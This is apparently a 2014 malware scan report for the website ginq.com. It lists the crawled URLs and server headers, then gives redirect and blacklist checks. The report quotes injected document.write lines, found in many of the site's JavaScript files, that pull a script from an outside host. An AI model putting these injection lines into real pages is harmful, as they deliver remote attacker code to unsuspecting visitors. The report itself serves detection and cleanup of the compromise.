Scanned pages/files
| Request | Server response | Status |
http://www.ginq.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:09 GMT Location: http://ginq.com/ Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 397 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/ | 200 OK Content-Length: 37482 Content-Type: text/html | clean |
http://ginq.com/js/jquery-1.6.2.js | 200 OK Content-Length: 236344 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051424"></script>'); | ||
http://www.ginq.com/js/jquery-ui.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:14 GMT Location: http://ginq.com/js/jquery-ui.min.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 416 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/js/jquery-ui.min.js | 200 OK Content-Length: 143 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051426"></script>'); | ||
http://www.ginq.com/js/jquery-ui-1.8.16.custom.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:14 GMT Location: http://ginq.com/js/jquery-ui-1.8.16.custom.min.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 430 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/js/jquery-ui-1.8.16.custom.min.js | 200 OK Content-Length: 210521 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051425"></script>'); | ||
http://www.ginq.com/js/default.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:17 GMT Location: http://ginq.com/js/default.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 410 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/js/default.js | 200 OK Content-Length: 4418 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051413"></script>'); | ||
http://www.ginq.com/js/popup.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:18 GMT Location: http://ginq.com/js/popup.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 408 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/js/popup.js | 200 OK Content-Length: 6199 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051437"></script>'); | ||
http://www.ginq.com/bundles/objectsuser/js/auth.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:19 GMT Location: http://ginq.com/bundles/objectsuser/js/auth.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 427 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/bundles/objectsuser/js/auth.js | 200 OK Content-Length: 514 Content-Type: application/javascript | clean |
http://www.ginq.com/js/recentActivitiesAnimation.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 08:28:20 GMT Location: http://ginq.com/js/recentActivitiesAnimation.js Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1 Content-Length: 428 Content-Type: text/html; charset=iso-8859-1 | clean |
http://ginq.com/js/recentactivitiesanimation.js | 503 Service Unavailable Content-Length: 23 Content-Type: text/html | clean |
http://ginq.com/test404page.js | 404 Not Found Content-Length: 11104 Content-Type: text/html | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 9028 Content-Type: application/x-javascript | clean |
http://ginq.com/moviesInTheaters | 200 OK Content-Length: 34553 Content-Type: text/html | clean |
http://ginq.com/js/autoresize.jquery.js | 200 OK Content-Length: 3728 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051412"></script>'); | ||
http://ginq.com/js/jquery.raty.js | 200 OK Content-Length: 10654 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051430"></script>'); | ||
http://ginq.com/js/ui.datetimepicker.js | 200 OK Content-Length: 65963 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051442"></script>'); | ||
http://ginq.com/js/jquery.alerts.js | 200 OK Content-Length: 9974 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://golf-lastminute.com/bkWdtCXh.php?id=8051428"></script>'); | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ginq.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, private
Connection: close
Date: Wed, 23 Apr 2014 08:28:10 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1
Vary: Accept-Encoding
Content-Length: 37482
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d1031a742973935271d725bf5ac3b674; path=/
X-Powered-By: PHP/5.3.21
...37482 bytes of data.
GET / HTTP/1.1
Host: ginq.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, private
Connection: close
Date: Wed, 23 Apr 2014 08:28:10 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips DAV/2 mod_bwlimited/1.4 SVN/1.6.11 mod_perl/2.0.6 Perl/v5.10.1
Vary: Accept-Encoding
Content-Length: 37482
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d1031a742973935271d725bf5ac3b674; path=/
X-Powered-By: PHP/5.3.21
...37482 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ginq.com
Referer: http://www.google.com/search?q=ginq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ginq.com
Referer: http://www.google.com/search?q=ginq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ginq.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ginq.com/
Result: ginq.com is not infected or malware details are not published yet.
Result: ginq.com is not infected or malware details are not published yet.